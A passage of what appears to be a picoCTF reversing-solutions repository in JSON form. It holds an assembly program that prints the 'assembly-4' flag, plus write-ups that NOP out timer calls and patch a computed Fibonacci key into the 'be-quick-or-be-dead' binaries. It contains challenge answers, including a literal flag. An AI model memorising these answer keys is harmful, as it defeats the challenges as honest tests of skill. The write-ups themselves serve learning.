esp, 8\n        push    42\n        movsx   eax, al\n        push    eax\n        call    sub\n        add     esp, 8\n        movsx   ecx, al\n        sub     ecx, 26\n        mov     eax, ecx\n        imul    ebx\n        lea     eax, [edx+ecx]\n        sar     eax, 6\n   
     mov     edx, ecx\n        sar     edx, 31\n        sub     eax, edx\n        imul    eax, eax, 78\n        sub     ecx, eax\n        add     ecx, 48\n        mov     byte [ebp-2DH], cl\n        push    43\n        push    94\n        call    sub\n        add     esp, 8\n        movsx   eax, al\n        lea     ecx, [eax-30H]\n        mov     eax, ecx\n        imul    ebx\n        lea     eax, [edx+ecx]\n        sar     eax, 6\n        mov     edx, ecx\n        sar     edx, 31\n        sub     eax, edx\n        imul    eax, eax, 78\n        sub     ecx, eax\n        mov     eax, ecx\n        add     eax, 48\n        movsx   eax, al\n        lea     ecx, [eax-30H]\n        mov     eax, ecx\n        imul    ebx\n        lea     eax, [edx+ecx]\n        sar     eax, 6\n        mov     edx, ecx\n        sar     edx, 31\n        sub     eax, edx\n        imul    eax, eax, 78\n        sub     ecx, eax\n        mov     eax, ecx\n        add     eax, 48\n        mov     byte [ebp-2BH], al\n        push    22\n        push    79\n        call    sub\n        add     esp, 8\n        mov     byte [ebp-29H], al\n        push    20\n        push    104\n        call    sub\n        add     esp, 8\n        movsx   eax, al\n        lea     ecx, [eax-1EH]\n        mov     eax, ecx\n        imul    ebx\n        lea     eax, [edx+ecx]\n        sar     eax, 6\n        mov     edx, ecx\n        sar     edx, 31\n        sub     eax, edx\n        imul    eax, eax, 78\n        sub     ecx, eax\n        mov     eax, ecx\n        add     eax, 48\n        movsx   eax, al\n        lea     ecx, [eax-18H]\n        mov     eax, ecx\n        imul    ebx\n        lea     eax, [edx+ecx]\n        sar     eax, 6\n        mov     edx, ecx\n        sar     edx, 31\n        sub     eax, edx\n        imul    eax, eax, 78\n        sub     ecx, eax\n        mov     eax, ecx\n        add     eax, 48\n        mov     byte [ebp-27H], al\n        push    24\n        push    48\n        call    sub\n        
add     esp, 8\n        push    54\n        movsx   eax, al\n        push    eax\n        call    sub\n        add     esp, 8\n        mov     byte [ebp-25H], al\n        push    50\n        push    70\n        call    sub\n        add     esp, 8\n        push    20\n        movsx   eax, al\n        push    eax\n        call    sub\n        add     esp, 8\n        movsx   ecx, al\n        add     ecx, 4\n        mov     eax, ecx\n        imul    ebx\n        lea     eax, [edx+ecx]\n        sar     eax, 6\n        mov     edx, ecx\n        sar     edx, 31\n        sub     eax, edx\n        imul    eax, eax, 78\n        sub     ecx, eax\n        add     ecx, 48\n        mov     byte [ebp-23H], cl\n        push    26\n        push    74\n        call    sub\n        add     esp, 8\n        mov     byte [ebp-21H], al\n        push    45\n        push    52\n        call    sub\n        add     esp, 8\n        push    35\n        movsx   eax, al\n        push    eax\n        call    sub\n        add     esp, 8\n        mov     byte [ebp-1FH], al\n        push    51\n        push    70\n        call    sub\n        add     esp, 8\n        push    47\n        movsx   eax, al\n        push    eax\n        call    sub\n        add     esp, 8\n        mov     byte [ebp-1DH], al\n        push    41\n        push    91\n        call    sub\n        add     esp, 8\n        mov     byte [ebp-1BH], al\n        push    34\n        push    93\n        call    sub\n        add     esp, 8\n        movsx   ecx, al\n        sub     ecx, 21\n        mov     eax, ecx\n        imul    ebx\n        lea     eax, [edx+ecx]\n        sar     eax, 6\n        mov     edx, ecx\n        sar     edx, 31\n        sub     eax, edx\n        imul    eax, eax, 78\n        sub     ecx, eax\n        add     ecx, 48\n        movsx   ecx, cl\n        sub     ecx, 9\n        mov     eax, ecx\n        imul    ebx\n        lea     eax, [edx+ecx]\n        sar     eax, 6\n        mov     edx, ecx\n        sar    
 edx, 31\n        sub     eax, edx\n        imul    eax, eax, 78\n        sub     ecx, eax\n        add     ecx, 48\n        mov     byte [ebp-19H], cl\n        lea     ebx, [ebp-44H]\n        lea     esi, [ebp-18H]\nL_001:  sub     esp, 4\n        push    1\n        push    ebx\n        push    1\n        call    write\n        add     ebx, 2\n        add     esp, 16\n        cmp     ebx, esi\n        jnz     L_001\n        lea     ebx, [ebp-43H]\n        lea     esi, [ebp-17H]\nL_002:  sub     esp, 4\n        push    1\n        push    ebx\n        push    1\n        call    write\n        add     ebx, 2\n        add     esp, 16\n        cmp     esi, ebx\n        jnz     L_002\n        mov     eax, 0\n        lea     esp, [ebp-0CH]\n        pop     ecx\n        pop     ebx\n        pop     esi\n        pop     ebp\n        lea     esp, [ecx-4H]\n        ret\n"
  },
  {
    "path": "Reversing/assembly-4/solution/Makefile",
    "content": "all:\n\tnasm -f elf32 comp.nasm\n\tgcc -m32 comp.o\n\t./a.out\nclean:\n\trm a.out comp.o\n"
  },
  {
    "path": "Reversing/assembly-4/solution/comp.nasm",
    "content": "\n\n\n\n\n\n\nglobal rrf0\nglobal rrf1\nglobal rrf2\nglobal rrf3\nglobal rrf4\nglobal rrf5\nglobal rrf6\nglobal rrf7\nglobal rrf8\nglobal rrf9\nglobal rrfcl\nglobal rrfscl\nglobal rrflt\nglobal rrfeq\nglobal rrfgt\nglobal rrfqm\nglobal rrfat\nglobal rrfA\nglobal rrfB\nglobal rrfC\nglobal rrfD\nglobal rrfE\nglobal rrfF\nglobal rrfG\nglobal rrfH\nglobal rrfI\nglobal rrfJ\nglobal rrfK\nglobal rrfL\nglobal rrfM\nglobal rrfN\nglobal rrfO\nglobal rrfP\nglobal rrfQ\nglobal rrfR\nglobal rrfS\nglobal rrfT\nglobal rrfU\nglobal rrfV\nglobal rrfW\nglobal rrfX\nglobal rrfY\nglobal rrfZ\nglobal rrflb\nglobal rrfbs\nglobal rrfrb\nglobal rrfct\nglobal rrfus\nglobal rrftl\nglobal rrfa\nglobal rrfb\nglobal rrfc\nglobal rrfd\nglobal rrfe\nglobal rrff\nglobal rrfg\nglobal rrfh\nglobal rrfi\nglobal rrfj\nglobal rrfk\nglobal rrfl\nglobal rrfm\nglobal rrfn\nglobal rrfo\nglobal rrfp\nglobal rrfq\nglobal rrfr\nglobal rrfs\nglobal rrft\nglobal rrfu\nglobal rrfv\nglobal rrfw\nglobal rrfx\nglobal rrfy\nglobal rrfz\nglobal rrflcb\nglobal rrfst\nglobal rrfrcb\nglobal rrf00\nglobal add\nglobal sub\nglobal xor\nglobal main\n\nextern write\n\n\nSECTION .text   \n\nrrf0:\n        mov     eax, 48\n        ret\n\n\nrrf1:\n        mov     eax, 49\n        ret\n\n\nrrf2:\n        mov     eax, 50\n        ret\n\n\nrrf3:\n        mov     eax, 51\n        ret\n\n\nrrf4:\n        mov     eax, 52\n        ret\n\n\nrrf5:\n        mov     eax, 53\n        ret\n\n\nrrf6:\n        mov     eax, 54\n        ret\n\n\nrrf7:\n        mov     eax, 55\n        ret\n\n\nrrf8:\n        mov     eax, 56\n        ret\n\n\nrrf9:\n        mov     eax, 57\n        ret\n\n\nrrfcl:\n        mov     eax, 58\n        ret\n\n\nrrfscl:\n        mov     eax, 59\n        ret\n\n\nrrflt:\n        mov     eax, 60\n        ret\n\n\nrrfeq:\n        mov     eax, 61\n        ret\n\n\nrrfgt:\n        mov     eax, 62\n        ret\n\n\nrrfqm:\n        mov     eax, 63\n        ret\n\n\nrrfat:\n        mov     eax, 64\n        
ret\n\n\nrrfA:\n        mov     eax, 65\n        ret\n\n\nrrfB:\n        mov     eax, 66\n        ret\n\n\nrrfC:\n        mov     eax, 67\n        ret\n\n\nrrfD:\n        mov     eax, 68\n        ret\n\n\nrrfE:\n        mov     eax, 69\n        ret\n\n\nrrfF:\n        mov     eax, 70\n        ret\n\n\nrrfG:\n        mov     eax, 71\n        ret\n\n\nrrfH:\n        mov     eax, 72\n        ret\n\n\nrrfI:\n        mov     eax, 73\n        ret\n\n\nrrfJ:\n        mov     eax, 74\n        ret\n\n\nrrfK:\n        mov     eax, 75\n        ret\n\n\nrrfL:\n        mov     eax, 76\n        ret\n\n\nrrfM:\n        mov     eax, 77\n        ret\n\n\nrrfN:\n        mov     eax, 78\n        ret\n\n\nrrfO:\n        mov     eax, 79\n        ret\n\n\nrrfP:\n        mov     eax, 80\n        ret\n\n\nrrfQ:\n        mov     eax, 81\n        ret\n\n\nrrfR:\n        mov     eax, 82\n        ret\n\n\nrrfS:\n        mov     eax, 83\n        ret\n\n\nrrfT:\n        mov     eax, 84\n        ret\n\n\nrrfU:\n        mov     eax, 85\n        ret\n\n\nrrfV:\n        mov     eax, 86\n        ret\n\n\nrrfW:\n        mov     eax, 87\n        ret\n\n\nrrfX:\n        mov     eax, 88\n        ret\n\n\nrrfY:\n        mov     eax, 89\n        ret\n\n\nrrfZ:\n        mov     eax, 90\n        ret\n\n\nrrflb:\n        mov     eax, 91\n        ret\n\n\nrrfbs:\n        mov     eax, 92\n        ret\n\n\nrrfrb:\n        mov     eax, 93\n        ret\n\n\nrrfct:\n        mov     eax, 94\n        ret\n\n\nrrfus:\n        mov     eax, 95\n        ret\n\n\nrrftl:\n        mov     eax, 96\n        ret\n\n\nrrfa:\n        mov     eax, 97\n        ret\n\n\nrrfb:\n        mov     eax, 98\n        ret\n\n\nrrfc:\n        mov     eax, 99\n        ret\n\n\nrrfd:\n        mov     eax, 100\n        ret\n\n\nrrfe:\n        mov     eax, 101\n        ret\n\n\nrrff:\n        mov     eax, 102\n        ret\n\n\nrrfg:\n        mov     eax, 103\n        ret\n\n\nrrfh:\n        mov     eax, 104\n        ret\n\n\nrrfi:\n        mov  
   eax, 105\n        ret\n\n\nrrfj:\n        mov     eax, 106\n        ret\n\n\nrrfk:\n        mov     eax, 107\n        ret\n\n\nrrfl:\n        mov     eax, 108\n        ret\n\n\nrrfm:\n        mov     eax, 109\n        ret\n\n\nrrfn:\n        mov     eax, 110\n        ret\n\n\nrrfo:\n        mov     eax, 111\n        ret\n\n\nrrfp:\n        mov     eax, 112\n        ret\n\n\nrrfq:\n        mov     eax, 113\n        ret\n\n\nrrfr:\n        mov     eax, 114\n        ret\n\n\nrrfs:\n        mov     eax, 115\n        ret\n\n\nrrft:\n        mov     eax, 116\n        ret\n\n\nrrfu:\n        mov     eax, 117\n        ret\n\n\nrrfv:\n        mov     eax, 118\n        ret\n\n\nrrfw:\n        mov     eax, 119\n        ret\n\n\nrrfx:\n        mov     eax, 120\n        ret\n\n\nrrfy:\n        mov     eax, 121\n        ret\n\n\nrrfz:\n        mov     eax, 122\n        ret\n\n\nrrflcb:\n        mov     eax, 123\n        ret\n\n\nrrfst:\n        mov     eax, 124\n        ret\n\n\nrrfrcb:\n        mov     eax, 125\n        ret\n\n\nrrf00:\n        mov     eax, 0\n        ret\n\n\nadd:\n        movsx   ecx, byte [esp+4H]\n        sub     ecx, 48\n        add     ecx, dword [esp+8H]\n        mov     edx, 3524075731\n        mov     eax, ecx\n        imul    edx\n        add     edx, ecx\n        sar     edx, 6\n        mov     eax, ecx\n        sar     eax, 31\n        sub     edx, eax\n        imul    edx, edx, 78\n        sub     ecx, edx\n        lea     eax, [ecx+30H]\n        ret\n\n\nsub:\n        movsx   ecx, byte [esp+4H]\n        sub     ecx, 48\n        sub     ecx, dword [esp+8H]\n        mov     edx, 3524075731\n        mov     eax, ecx\n        imul    edx\n        add     edx, ecx\n        sar     edx, 6\n        mov     eax, ecx\n        sar     eax, 31\n        sub     edx, eax\n        imul    edx, edx, 78\n        sub     ecx, edx\n        mov     edx, ecx\n        lea     ecx, [ecx+7EH]\n        lea     eax, [edx+30H]\n        test    edx, edx\n        cmovs   
eax, ecx\n        ret\n\n\nxor:\n        movsx   ecx, byte [esp+4H]\n        sub     ecx, 48\n        mov     eax, dword [esp+8H]\n        and     eax, 07H\n        xor     ecx, eax\n        mov     edx, 3524075731\n        mov     eax, ecx\n        imul    edx\n        add     edx, ecx\n        sar     edx, 6\n        mov     eax, ecx\n        sar     eax, 31\n        sub     edx, eax\n        imul    edx, edx, 78\n        sub     ecx, edx\n        lea     eax, [ecx+30H]\n        ret\n\n\nmain:\n        lea     ecx, [esp+4H]\n        and     esp, 0FFFFFFF0H\n        push    dword [ecx-4H]\n        push    ebp\n        mov     ebp, esp\n        push    esi\n        push    ebx\n        push    ecx\n        sub     esp, 60\n        push    39\n        push    73\n        call    sub\n        add     esp, 8\n        mov     byte [ebp-44H], al\n        push    48\n        push    99\n        call    sub\n        add     esp, 8\n        push    24\n        movsx   eax, al\n        push    eax\n        call    sub\n        add     esp, 8\n        mov     byte [ebp-42H], al\n        push    44\n        push    68\n        call    sub\n        add     esp, 8\n        movsx   ecx, al\n        sub     ecx, 48\n        xor     ecx, 05H\n        mov     ebx, 3524075731\n        mov     eax, ecx\n        imul    ebx\n        lea     eax, [edx+ecx]\n        sar     eax, 6\n        mov     edx, ecx\n        sar     edx, 31\n        sub     eax, edx\n        imul    eax, eax, 78\n        sub     ecx, eax\n        add     ecx, 48\n        mov     byte [ebp-40H], cl\n        push    41\n        push    121\n        call    sub\n        add     esp, 8\n        push    47\n        movsx   eax, al\n        push    eax\n        call    sub\n        add     esp, 8\n        movsx   ecx, al\n        sub     ecx, 48\n        mov     eax, ecx\n        imul    ebx\n        lea     eax, [edx+ecx]\n        sar     eax, 6\n        mov     edx, ecx\n        sar     edx, 31\n        sub     eax, 
edx\n        imul    eax, eax, 78\n        sub     ecx, eax\n        add     ecx, 48\n        mov     byte [ebp-3EH], cl\n        push    31\n        push    54\n        call    sub\n        add     esp, 8\n        push    34\n        movsx   eax, al\n        push    eax\n        call    sub\n        add     esp, 8\n        mov     byte [ebp-3CH], al\n        push    54\n        push    55\n        call    sub\n        add     esp, 8\n        push    49\n        movsx   ecx, al\n        add     ecx, 6\n        mov     eax, ecx\n        imul    ebx\n        lea     eax, [edx+ecx]\n        sar     eax, 6\n        mov     edx, ecx\n        sar     edx, 31\n        sub     eax, edx\n        imul    eax, eax, 78\n        sub     ecx, eax\n        lea     eax, [ecx+30H]\n        movsx   eax, al\n        push    eax\n        call    sub\n        add     esp, 8\n        mov     byte [ebp-3AH], al\n        push    40\n        push    108\n        call    sub\n        add     esp, 8\n        movsx   ecx, al\n        sub     ecx, 48\n        xor     ecx, 02H\n        mov     eax, ecx\n        imul    ebx\n        lea     eax, [edx+ecx]\n        sar     eax, 6\n        mov     edx, ecx\n        sar     edx, 31\n        sub     eax, edx\n        imul    eax, eax, 78\n        sub     ecx, eax\n        add     ecx, 48\n        mov     byte [ebp-38H], cl\n        mov     byte [ebp-36H], 123\n        push    50\n        push    99\n        call    sub\n        add     esp, 8\n        mov     byte [ebp-34H], al\n        mov     byte [ebp-32H], 95\n        push    32\n        push    102\n        call    sub\n        add     esp, 8\n        push    22\n        movsx   eax, al\n        push    eax\n        call    sub\n        add     esp, 8\n        movsx   ecx, al\n        add     ecx, 8\n        mov     eax, ecx\n        imul    ebx\n        lea     eax, [edx+ecx]\n        sar     eax, 6\n        mov     edx, ecx\n        sar     edx, 31\n        sub     eax, edx\n        imul    
eax, eax, 78\n        sub     ecx, eax\n        add     ecx, 48\n        mov     byte [ebp-30H], cl\n        push    20\n        push    107\n        call    sub\n        add     esp, 8\n        push    39\n        movsx   eax, al\n        push    eax\n        call    sub\n        add     esp, 8\n        mov     byte [ebp-2EH], al\n        push    46\n        push    80\n        call    sub\n        add     esp, 8\n        mov     byte [ebp-2CH], al\n        push    27\n        push    78\n        call    sub\n        add     esp, 8\n        mov     byte [ebp-2AH], al\n        push    28\n        push    123\n        call    sub\n        add     esp, 8\n        mov     byte [ebp-28H], al\n        mov     byte [ebp-26H], 55\n        push    36\n        push    84\n        call    sub\n        add     esp, 8\n        mov     byte [ebp-24H], al\n        push    33\n        push    107\n        call    sub\n        add     esp, 8\n        push    39\n        movsx   ecx, al\n        sub     ecx, 48\n        xor     ecx, 04H\n        mov     eax, ecx\n        imul    ebx\n        lea     eax, [edx+ecx]\n        sar     eax, 6\n        mov     edx, ecx\n        sar     edx, 31\n        sub     eax, edx\n        imul    eax, eax, 78\n        sub     ecx, eax\n        lea     eax, [ecx+30H]\n        movsx   eax, al\n        push    eax\n        call    sub\n        add     esp, 8\n        mov     byte [ebp-22H], al\n        push    49\n        push    66\n        call    sub\n        add     esp, 8\n        mov     byte [ebp-20H], al\n        mov     byte [ebp-1EH], 99\n        push    36\n        push    57\n        call    sub\n        add     esp, 8\n        movsx   ecx, al\n        sub     ecx, 48\n        xor     ecx, 07H\n        mov     eax, ecx\n        imul    ebx\n        lea     eax, [edx+ecx]\n        sar     eax, 6\n        mov     edx, ecx\n        sar     edx, 31\n        sub     eax, edx\n        imul    eax, eax, 78\n        sub     ecx, eax\n        add   
  ecx, 48\n        movsx   ecx, cl\n        sub     ecx, 22\n        mov     eax, ecx\n        imul    ebx\n        lea     eax, [edx+ecx]\n        sar     eax, 6\n        mov     edx, ecx\n        sar     edx, 31\n        sub     eax, edx\n        imul    eax, eax, 78\n        sub     ecx, eax\n        add     ecx, 48\n        mov     byte [ebp-1CH], cl\n        mov     byte [ebp-1AH], 109\n        mov     byte [ebp-43H], 80\n        push    18\n        push    67\n        call    sub\n        add     esp, 8\n        mov     byte [ebp-41H], al\n        push    32\n        push    112\n        call    sub\n        add     esp, 8\n        push    25\n        movsx   eax, al\n        lea     ecx, [eax+5H]\n        mov     eax, ecx\n        imul    ebx\n        lea     eax, [edx+ecx]\n        sar     eax, 6\n        mov     edx, ecx\n        sar     edx, 31\n        sub     eax, edx\n        imul    eax, eax, 78\n        sub     ecx, eax\n        mov     eax, ecx\n        add     eax, 48\n        movsx   eax, al\n        push    eax\n        call    sub\n        add     esp, 8\n        mov     byte [ebp-3FH], al\n        push    37\n        push    109\n        call    sub\n        add     esp, 8\n        movsx   ecx, al\n        sub     ecx, 48\n        xor     ecx, 06H\n        mov     eax, ecx\n        imul    ebx\n        lea     eax, [edx+ecx]\n        sar     eax, 6\n        mov     edx, ecx\n        sar     edx, 31\n        sub     eax, edx\n        imul    eax, eax, 78\n        sub     ecx, eax\n        add     ecx, 48\n        movsx   ecx, cl\n        add     ecx, 3\n        mov     eax, ecx\n        imul    ebx\n        lea     eax, [edx+ecx]\n        sar     eax, 6\n        mov     edx, ecx\n        sar     edx, 31\n        sub     eax, edx\n        imul    eax, eax, 78\n        sub     ecx, eax\n        add     ecx, 48\n        mov     byte [ebp-3DH], cl\n        push    31\n        push    49\n        call    sub\n        add     esp, 8\n        movsx   
ecx, al\n        sub     ecx, 48\n        xor     ecx, 04H\n        mov     eax, ecx\n        imul    ebx\n        lea     eax, [edx+ecx]\n        sar     eax, 6\n        mov     edx, ecx\n        sar     edx, 31\n        sub     eax, edx\n        imul    eax, eax, 78\n        sub     ecx, eax\n        add     ecx, 48\n        mov     byte [ebp-3BH], cl\n        push    23\n        push    118\n        call    sub\n        add     esp, 8\n        mov     byte [ebp-39H], al\n        push    43\n        push    81\n        call    sub\n        add     esp, 8\n        mov     byte [ebp-37H], al\n        push    34\n        push    61\n        call    sub\n        add     esp, 8\n        movsx   ecx, al\n        sub     ecx, 48\n        xor     ecx, 03H\n        mov     eax, ecx\n        imul    ebx\n        lea     eax, [edx+ecx]\n        sar     eax, 6\n        mov     edx, ecx\n        sar     edx, 31\n        sub     eax, edx\n        imul    eax, eax, 78\n        sub     ecx, eax\n        add     ecx, 48\n        movsx   ecx, cl\n        sub     ecx, 4\n        mov     eax, ecx\n        imul    ebx\n        lea     eax, [edx+ecx]\n        sar     eax, 6\n        mov     edx, ecx\n        sar     edx, 31\n        sub     eax, edx\n        imul    eax, eax, 78\n        sub     ecx, eax\n        add     ecx, 48\n        mov     byte [ebp-35H], cl\n        push    51\n        push    100\n        call    sub\n        add     esp, 8\n        mov     byte [ebp-33H], al\n        push    27\n        push    80\n        call    sub\n        add     esp, 8\n        mov     byte [ebp-31H], al\n        mov     byte [ebp-2FH], 95\n        push    40\n        push    110\n        call    sub\n        add     esp, 8\n        push    42\n        movsx   eax, al\n        push    eax\n        call    sub\n        add     esp, 8\n        movsx   ecx, al\n        sub     ecx, 26\n        mov     eax, ecx\n        imul    ebx\n        lea     eax, [edx+ecx]\n        sar     eax, 6\n   
     mov     edx, ecx\n        sar     edx, 31\n        sub     eax, edx\n        imul    eax, eax, 78\n        sub     ecx, eax\n        add     ecx, 48\n        mov     byte [ebp-2DH], cl\n        push    43\n        push    94\n        call    sub\n        add     esp, 8\n        movsx   eax, al\n        lea     ecx, [eax-30H]\n        mov     eax, ecx\n        imul    ebx\n        lea     eax, [edx+ecx]\n        sar     eax, 6\n        mov     edx, ecx\n        sar     edx, 31\n        sub     eax, edx\n        imul    eax, eax, 78\n        sub     ecx, eax\n        mov     eax, ecx\n        add     eax, 48\n        movsx   eax, al\n        lea     ecx, [eax-30H]\n        mov     eax, ecx\n        imul    ebx\n        lea     eax, [edx+ecx]\n        sar     eax, 6\n        mov     edx, ecx\n        sar     edx, 31\n        sub     eax, edx\n        imul    eax, eax, 78\n        sub     ecx, eax\n        mov     eax, ecx\n        add     eax, 48\n        mov     byte [ebp-2BH], al\n        push    22\n        push    79\n        call    sub\n        add     esp, 8\n        mov     byte [ebp-29H], al\n        push    20\n        push    104\n        call    sub\n        add     esp, 8\n        movsx   eax, al\n        lea     ecx, [eax-1EH]\n        mov     eax, ecx\n        imul    ebx\n        lea     eax, [edx+ecx]\n        sar     eax, 6\n        mov     edx, ecx\n        sar     edx, 31\n        sub     eax, edx\n        imul    eax, eax, 78\n        sub     ecx, eax\n        mov     eax, ecx\n        add     eax, 48\n        movsx   eax, al\n        lea     ecx, [eax-18H]\n        mov     eax, ecx\n        imul    ebx\n        lea     eax, [edx+ecx]\n        sar     eax, 6\n        mov     edx, ecx\n        sar     edx, 31\n        sub     eax, edx\n        imul    eax, eax, 78\n        sub     ecx, eax\n        mov     eax, ecx\n        add     eax, 48\n        mov     byte [ebp-27H], al\n        push    24\n        push    48\n        call    sub\n        
add     esp, 8\n        push    54\n        movsx   eax, al\n        push    eax\n        call    sub\n        add     esp, 8\n        mov     byte [ebp-25H], al\n        push    50\n        push    70\n        call    sub\n        add     esp, 8\n        push    20\n        movsx   eax, al\n        push    eax\n        call    sub\n        add     esp, 8\n        movsx   ecx, al\n        add     ecx, 4\n        mov     eax, ecx\n        imul    ebx\n        lea     eax, [edx+ecx]\n        sar     eax, 6\n        mov     edx, ecx\n        sar     edx, 31\n        sub     eax, edx\n        imul    eax, eax, 78\n        sub     ecx, eax\n        add     ecx, 48\n        mov     byte [ebp-23H], cl\n        push    26\n        push    74\n        call    sub\n        add     esp, 8\n        mov     byte [ebp-21H], al\n        push    45\n        push    52\n        call    sub\n        add     esp, 8\n        push    35\n        movsx   eax, al\n        push    eax\n        call    sub\n        add     esp, 8\n        mov     byte [ebp-1FH], al\n        push    51\n        push    70\n        call    sub\n        add     esp, 8\n        push    47\n        movsx   eax, al\n        push    eax\n        call    sub\n        add     esp, 8\n        mov     byte [ebp-1DH], al\n        push    41\n        push    91\n        call    sub\n        add     esp, 8\n        mov     byte [ebp-1BH], al\n        push    34\n        push    93\n        call    sub\n        add     esp, 8\n        movsx   ecx, al\n        sub     ecx, 21\n        mov     eax, ecx\n        imul    ebx\n        lea     eax, [edx+ecx]\n        sar     eax, 6\n        mov     edx, ecx\n        sar     edx, 31\n        sub     eax, edx\n        imul    eax, eax, 78\n        sub     ecx, eax\n        add     ecx, 48\n        movsx   ecx, cl\n        sub     ecx, 9\n        mov     eax, ecx\n        imul    ebx\n        lea     eax, [edx+ecx]\n        sar     eax, 6\n        mov     edx, ecx\n        sar    
 edx, 31\n        sub     eax, edx\n        imul    eax, eax, 78\n        sub     ecx, eax\n        add     ecx, 48\n        mov     byte [ebp-19H], cl\n        lea     ebx, [ebp-44H]\n        lea     esi, [ebp-18H]\nL_001:  sub     esp, 4\n        push    1\n        push    ebx\n        push    1\n        call    write\n        add     ebx, 2\n        add     esp, 16\n        cmp     ebx, esi\n        jnz     L_001\n        lea     ebx, [ebp-43H]\n        lea     esi, [ebp-17H]\nL_002:  sub     esp, 4\n        push    1\n        push    ebx\n        push    1\n        call    write\n        add     ebx, 2\n        add     esp, 16\n        cmp     esi, ebx\n        jnz     L_002\n        mov     eax, 0\n        lea     esp, [ebp-0CH]\n        pop     ecx\n        pop     ebx\n        pop     esi\n        pop     ebp\n        lea     esp, [ecx-4H]\n        ret\n"
  },
  {
    "path": "Reversing/assembly-4/solution/solve.sh",
    "content": "make all\necho\n"
  },
  {
    "path": "Reversing/be-quick-or-be-dead-1/README.md",
    "content": "# be-quick-or-be-dead-1\nPoints: 200\n\n## Category\nReversing\n\n## Question\n>You [find](https://www.youtube.com/watch?v=CTt1vk9nM9c) this when searching for some music, which leads you to [be-quick-or-be-dead-1](files/be-quick-or-be-dead-1). Can you run it fast enough? You can also find the executable in /problems/be-quick-or-be-dead-1_3_aeb48854203a88fb1da963f41ae06a1c. \n\n### Hint\n>What will the key finally be?\n\n## Solution\nOverwrite the _set_timer_ function with nops by patching the program.\n\n```asm\n[0x00400849]> pdf\n|           ;-- main:\n/ (fcn) sym.main 62\n|   sym.main (int arg1, int arg2);\n|           ; var int local_10h @ rbp-0x10\n|           ; var int local_4h @ rbp-0x4\n|           ; DATA XREF from entry0 (0x4005bd)\n|           0x00400827      55             push rbp\n|           0x00400828      4889e5         mov rbp, rsp\n|           0x0040082b      4883ec10       sub rsp, 0x10\n|           0x0040082f      897dfc         mov dword [local_4h], edi   ; arg1\n|           0x00400832      488975f0       mov qword [local_10h], rsi  ; arg2\n|           0x00400836      b800000000     mov eax, 0\n|           0x0040083b      e8a9ffffff     call sym.header\n|           0x00400840      b800000000     mov eax, 0\n|           0x00400845      90             nop\n|           0x00400846      90             nop\n|           0x00400847      90             nop\n|           0x00400848      90             nop\n|           0x00400849      90             nop\n|           0x0040084a      b800000000     mov eax, 0\n|           0x0040084f      e842ffffff     call sym.get_key\n|           0x00400854      b800000000     mov eax, 0\n|           0x00400859      e863ffffff     call sym.print_flag\n|           0x0040085e      b800000000     mov eax, 0\n|           0x00400863      c9             leave\n\\           0x00400864      c3             ret\n[0x00400849]> exit\n```\n\nSave and run the program to get the flag.\n\nPatched binary 
[be-quick-or-be-dead-1_patched](solution/be-quick-or-be-dead-1_patched).\n\n### Flag\n`picoCTF{why_bother_doing_unnecessary_computation_27f28e71}`\n"
  },
  {
    "path": "Reversing/be-quick-or-be-dead-2/README.md",
    "content": "# be-quick-or-be-dead-2\nPoints: 275\n\n## Category\nReversing\n\n## Question\n>As you enjoy this [music](https://www.youtube.com/watch?v=CTt1vk9nM9c) even more, another executable [be-quick-or-be-dead-2](files/be-quick-or-be-dead-2) shows up. Can you run this fast enough too? You can also find the executable in /problems/be-quick-or-be-dead-2_4_aeb39eed03c948aec1bf7fa3d03dad0c. \n\n### Hint\n>Can you call stuff without executing the entire program?\n>\n>What will the key finally be?\n\n## Solution\nPatch the binary to remove the _set_timer_ function using NOPs.\n\n```asm\n[0x0040085f]> wx 9090909090 @ 0x0040087d\n[0x0040085f]> pdf\n            ;-- main:\n/ (fcn) sym.main 62\n|   sym.main (int argc, char **argv, char **envp);\n|           ; var int local_10h @ rbp-0x10\n|           ; var int local_4h @ rbp-0x4\n|           ; arg int argc @ rdi\n|           ; arg char **argv @ rsi\n|           ; DATA XREF from entry0 (0x4005bd)\n|           0x0040085f      55             push rbp\n|           0x00400860      4889e5         mov rbp, rsp\n|           0x00400863      4883ec10       sub rsp, 0x10\n|           0x00400867      897dfc         mov dword [local_4h], edi   ; argc\n|           0x0040086a      488975f0       mov qword [local_10h], rsi  ; argv\n|           0x0040086e      b800000000     mov eax, 0\n|           0x00400873      e8a9ffffff     call sym.header\n|           0x00400878      b800000000     mov eax, 0\n|           0x0040087d      90             nop\n|           0x0040087e      90             nop\n|           0x0040087f      90             nop\n|           0x00400880      90             nop\n|           0x00400881      90             nop\n|           0x00400882      b800000000     mov eax, 0\n|           0x00400887      e842ffffff     call sym.get_key\n|           0x0040088c      b800000000     mov eax, 0\n|           0x00400891      e863ffffff     call sym.print_flag\n|           0x00400896      b800000000     mov eax, 0\n|           
0x0040089b      c9             leave\n\\           0x0040089c      c3             ret\n```\n\nStudying the binary, it seems that it computes the Fibonacci sequence recursively, which is why it takes so long.\n\nWe can use Python to calculate the result iteratively. This will make the process a lot faster.\n\nCode stolen from: https://gist.github.com/sgammon/4185115\n\n```python\nn = 1083\n\ndef fib(n):\n    i = 0\n    nextterm = 1\n    present = 1\n    previous = 0\n\n    while i < n:\n        nextterm = present + previous\n        present = previous\n        previous = nextterm\n        i = i + 1\n    return nextterm\n\nresult = fib(n)\nprint(result & (2 ** 64 - 1))\n```\n\nWe need to convert the huge number into a 64-bit number so that our program can process it. This is done by doing `result & (2 ** 64 - 1)`. We get `13519797236961659458`.\n\nNow all we have to do is to patch the binary, and set `rax = 13519797236961659458`. We will need 10 bytes to create this instruction. We can overwrite from addresses `0x004007dc` to `0x004007e5`.\n\n```asm\n/ (fcn) sym.get_key 43\n|   sym.get_key ();\n|           ...\n|           ...\n|           0x004007d7      e854fdffff     call sym.imp.puts           ; int puts(const char *s)\n|           0x004007dc      b800000000     mov eax, 0\n|           0x004007e1      e865ffffff     call sym.calculate_key\n|           0x004007e6      8905d4082000   mov dword [obj.key], eax    ; obj.__TMC_END ; [0x6010c0:4]=0\n|           0x004007ec      bfcb094000     mov edi, str.Done_calculating_key ; 0x4009cb ; \"Done calculating key\" ; const char *s\n|           0x004007f1      e83afdffff     call sym.imp.puts           ; int puts(const char *s)\n|           ...\n\\           ...\n```\n\nNow all we have left to do is to patch it and run it.\n\n```asm\n[0x004007ce]> wa mov rax, 13519797236961659458 @ 0x004007dc\nWritten 10 byte(s) (mov rax, 13519797236961659458) = wx 48b8424a68c0f4f79fbb\n[0x004007ce]> pdf\n/ (fcn) sym.get_key 43\n|   sym.get_key 
